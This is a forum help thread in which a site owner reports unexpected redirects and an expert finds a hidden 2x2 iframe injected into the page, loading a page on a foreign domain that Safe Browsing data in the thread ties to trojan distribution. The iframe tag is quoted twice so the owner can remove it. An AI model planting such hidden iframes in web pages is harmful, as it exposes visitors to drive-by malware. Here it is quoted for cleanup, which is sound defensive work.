Solved

Hijacked site

Posted on 2013-01-17
9
434 Views
Last Modified: 2013-12-06
I am trying to sort out another issue on the following site, however since I've posted the question and link to in on Expert Exchange, it seems that the site has been hijcked and is re-directing to another site. The site in question is:

http://www.neuproessentials.co.uk

this is what a previous expert had to say ID: 38790188

Used a hack / slave AV machive and get redirected to:
http://macskako.com/hmod.html giving :

Forbidden
You don't have permission to access /hmod.html on this server.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

Open in new window

                                           
Any help on how to correct this would be greatly appreciated.

Thanks
0
Comment
Question by:smythers
9 Comments
 
LVL 1

Expert Comment

by:SirLagz
ID: 38792295
That site is working for me at the moment.
Going to a Neupro patches site ?
0
 

Author Comment

by:smythers
ID: 38792368
Yes, that's what it's meant to be doing but the experts who were trying to click on the link yesterday were getting redirected to some strange site and suggested I get it sorted here first.. Thanks for taking a look

I don't suppose you would be able to tell my why the video on this page will not work in IE 6, 7 or 8? That is my real problem.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 38794281
I'm getting redirected to:
http://macskako.com/hmod.html
in Google Chrome but not in IE8.

Forbidden
You don't have permission to access /hmod.html on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

This comment is at 19:00 GMT, just as a reference.

Right at the end of your http://www.neuproessentials.co.uk after the tracking script you have this:

<!-- WiredMinds Piwik tracking END -->
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe></body>
</html>

Open in new window


Did you place that there?
0
Better Security Awareness With Threat Intelligence

See how one of the leading financial services organizations uses Recorded Future as part of a holistic threat intelligence program to promote security awareness and proactively and efficiently identify threats.

 
LVL 38

Expert Comment

by:BillDL
ID: 38794287
Now it loads the correct page in Chrome 2nd time around.

By the way, the domain macskako.com is registered in Budapast, Hungary.
http://www.dnsstuff.com/tools#whois/type=domain&&value=macskako.com&&
0
 
LVL 38

Accepted Solution

by:
BillDL earned 500 total points
ID: 38795825
Some Info:

http://evuln.com/tools/malware-scanner/www.neuproessentials.co.uk/

http://evuln.com/tools/malware-scanner/macskako.com/


Safe Browsing Diagnostic page for neuproessentials.co.uk valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=neuproessentials.co.uk/

What is the current listing status for neuproessentials.co.uk?
This site is not currently listed as suspicious.
What happened when Google visited this site?
Google has not visited this site within the past 90 days.
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, neuproessentials.co.uk did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

Safe Browsing Diagnostic page for macskako.com  valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=macskako.com/

What is the current listing status for macskako.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-11-17, and the last time suspicious content was found on this site was on 2012-11-17.
Malicious software includes 1 trojan(s).

This site was hosted on 1 network(s) including AS12301 (INVITEL).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, macskako.com appeared to function as an intermediary for the infection of 8 site(s) including showyai.com, techinspecialed.com, geocaching.com.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.


Search all your website's pages for this tag:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe>

Open in new window

and delete from <iframe> through to and including </iframe> for each instance.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 39345902
Thanks younghv
0
 
LVL 38

Expert Comment

by:younghv
ID: 39346032
Hey BillDL -
Glad to help.
I've been on hiatus for several months, but will endeavor (endeavour) to keep these caught up better.
Vic
0

Featured Post

How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

Join & Write a Comment

Malware seems to be getting smarter and smarter. If you are having trouble being able to launch your malware removal tools such as (and recommended): MalwareBytes, HiJackThis, ComboFix, etc. you can try some of the workarounds listed below. 1. Ma…
It started not too long ago. It was at first annoying. My keystrokes seemed to be randomly generated, not the ones I typed on the keyboard. For some reason this only happened in certain applications (especially browsers such as IE11, Firefox and Chr…
Here's a very brief overview of the methods PRTG Network Monitor (https://www.paessler.com/prtg) offers for monitoring bandwidth, to help you decide which methods you´d like to investigate in more detail.  The methods are covered in more detail in o…
Polish reports in Access so they look terrific. Take yourself to another level. Equations, Back Color, Alternate Back Color. Write easy VBA Code. Tighten space to use less pages. Launch report from a menu, considering criteria only when it is filled…

707 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

15 Experts available now in Live!

Get 1:1 Help Now